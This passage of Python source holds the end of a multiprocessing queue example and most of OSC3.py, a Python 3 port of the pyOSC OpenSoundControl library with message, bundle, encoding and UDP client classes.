Process(target=sender, args=(childEnd,)).start() # spawn child with pipe
print('parent got:', parentEnd.recv()) # receive from child
print('parent exit')
"""
import os, time, queue
from multiprocessing import Process, Queue # process-safe shared queue
# queue is a pipe + locks/semas
class Counter(Process):
def __init__(self, queue): # retain state for us in run
self.post = queue
Process.__init__(self)
def run(self): # run in newprocess on start()
for i in range(3):
time.sleep(1)
self.post.put(Spam().action) # stdout file is shared by all
print('child exit')
if __name__ == '__main__':
print('start', os.getpid())
post = Queue()
p = Counter(post)
p.start()
while True: # parent consumes data on queue
time.sleep(0.5) # this is essentially like a GUI,
try: # though GUIs often use threads
data = post.get(block=False)
except queue.Empty:
print('no data...')
else:
print('posted:', data)
break
p.join()
print('finish', os.getpid(), p.exitcode) # exitcode is child exit status
"""
|
OSC3.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
March 2015:
Python 3 version tested in Blender and simpleOSC with twisted
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from socketserver import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address=""):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument
"""
self.clear(address)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = b""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if isinstance(argument,dict):
argument = list(argument.items())
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__') and not type(argument) in (str,bytes):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(list(self.values())))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(list(self.values()))
if isinstance(values,tuple):
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = list(self.values())
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in list(self.values()))
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return list(self.values())[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = list(self.items())
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = list(values.items())
elif isinstance(values,list):
items = []
for val in values:
if isinstance(val,tuple):
items.append(val[:2])
else:
items.append((typehint, val))
elif isinstance(values,tuple):
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = list(self.items())
new_items = self._buildItemList(val)
if not isinstance(i,slice):
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = list(self.items())
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return list(self.values()).count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return list(self.values()).index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = list(self.items()) + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = list(self.items())
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = list(self.items())
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = list(self.items())
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = list(self.items())
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(list(self.values()))
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(list(self.items()))
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in list(self.values()):
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if isinstance(argument,dict):
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next).encode('latin1'))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if isinstance(next,str):
next = next.encode('latin1')
if isinstance(next,bytes):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = b''
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', int(secs), int(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = data.find(b'\0')
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length].decode('latin1'), data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (int(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
if isinstance(bytes,str):
bytes = bytes.encode('latin1')
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % bytes[i]
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if isinstance(port,int):
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (isinstance(url,str) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
When the 'address' argument is given this client is connected to a specific remote server.
- address ((host, port) tuple): the address of the remote server to send all messages to
Otherwise it acts as a generic client:
If address == 'None', the client doesn't connect to a specific remote server,
and the remote address must be supplied when calling sendto()
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
if server == None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = None
else:
self.setServer(server)
self.client_address = None
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
if self.socket != None:
self.close()
self.socket = server.socket.dup()
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
return self.socket.getpeername()
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self.socket.connect(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.connect(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if isinstance(args,str):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in list(filters.keys()):
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in list(filters.values()):
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in list(filters.items()):
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = str.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
